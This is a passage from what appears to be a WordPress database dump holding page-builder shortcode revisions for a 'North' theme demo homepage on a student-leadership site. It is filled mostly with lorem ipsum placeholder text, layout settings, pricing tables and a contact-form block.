el_id=\"what-we-do\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"What we do\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"0\" text_align=\"center\" color=\"white\"][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\r\n<h1>PARALLAX WITH DEGRADE</h1>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\r\n\r\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\r\n\r\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[/list]\r\n\r\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\r\n\r\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" img_size=\"full\" alignment=\"right\" css_animation=\"right-to-left\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column][special_heading title=\"WHAT OUR FUN FACTORS\" margin_bottom=\"0\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"works\" css=\".vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\"][vc_column][special_heading title=\"Our Portfolio\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][portfolio_grid cats=\"branding,design,photography,video\" posts_nr=\"9\" more_url=\"http://veented.com/themes/north/portfolio/\" style=\"default\" paged_posts=\"no\" thumb_style=\"alt\" fullwidth=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column][special_heading title=\"Our Creative Team\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][team_carousel][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"Features With Mobile\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][/vc_column][/vc_row][vc_row parallax=\"yes\" bg_overlay=\"dark\" css=\".vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\"][vc_column][testimonials posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column][special_heading title=\"What Clients Says\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][/vc_column][/vc_row][vc_row el_id=\"what-we\" css=\".vc_custom_1409759211052{padding-bottom: 80px !important;}\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row parallax=\"yes\" color_scheme=\"white\" bg_overlay=\"dark\" content_width=\"fullwidth\" css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" darken=\"dark\" fullwidth=\"yes\"][vc_column][special_heading title=\"Our Featured Works\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\" color=\"dark\"][portfolio_carousel cats=\"branding,design,photography,video\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_subtitle=\"click for our all works\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_subtitle=\"send us a message\" button2_url=\"#contact\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][special_heading title=\"Our Skills\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"services\" bg_overlay=\"light\" css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"OUR SERVICES\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\" color=\"dark\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"prices\" color_scheme=\"white\" bg_overlay=\"darker\" css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\"][vc_column][special_heading title=\"Our Pricing Tables\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" featured=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2020-11-06 01:23:42','2020-11-06 01:23:42','',623,'http://highperformingstudent.com/2020/11/06/623-revision-v1/',0,'revision','',0),(2049,1,'2020-10-28 15:45:35','2020-10-28 15:45:35','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Leadership starts with you\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Helping students build better habits, communicate more effectively, and become better leaders.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}\"][vc_column][logos_carousel images=\"2043,2045,2047,2046,2048\" cols=\"5\" logo_max_height=\"60\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][special_heading title=\"About North\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"65\" text_align=\"center\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"300\" text_style=\"fullwidth\" icon=\"fa-desktop\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"500\" text_style=\"fullwidth\" icon=\"fa-comments-o\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"700\" text_style=\"fullwidth\" icon=\"fa-life-ring\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"900\" text_style=\"fullwidth\" icon=\"fa-flask\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"what-we-do\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"What we do\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"0\" text_align=\"center\" color=\"white\"][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\r\n<h1>PARALLAX WITH DEGRADE</h1>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\r\n\r\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\r\n\r\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[/list]\r\n\r\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\r\n\r\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" img_size=\"full\" alignment=\"right\" css_animation=\"right-to-left\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column][special_heading title=\"WHAT OUR FUN FACTORS\" margin_bottom=\"0\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"works\" css=\".vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\"][vc_column][special_heading title=\"Our Portfolio\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][portfolio_grid cats=\"branding,design,photography,video\" posts_nr=\"9\" more_url=\"http://veented.com/themes/north/portfolio/\" style=\"default\" paged_posts=\"no\" thumb_style=\"alt\" fullwidth=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column][special_heading title=\"Our Creative Team\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][team_carousel][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"Features With Mobile\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][/vc_column][/vc_row][vc_row parallax=\"yes\" bg_overlay=\"dark\" css=\".vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\"][vc_column][testimonials posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column][special_heading title=\"What Clients Says\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][/vc_column][/vc_row][vc_row el_id=\"what-we\" css=\".vc_custom_1409759211052{padding-bottom: 80px !important;}\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" 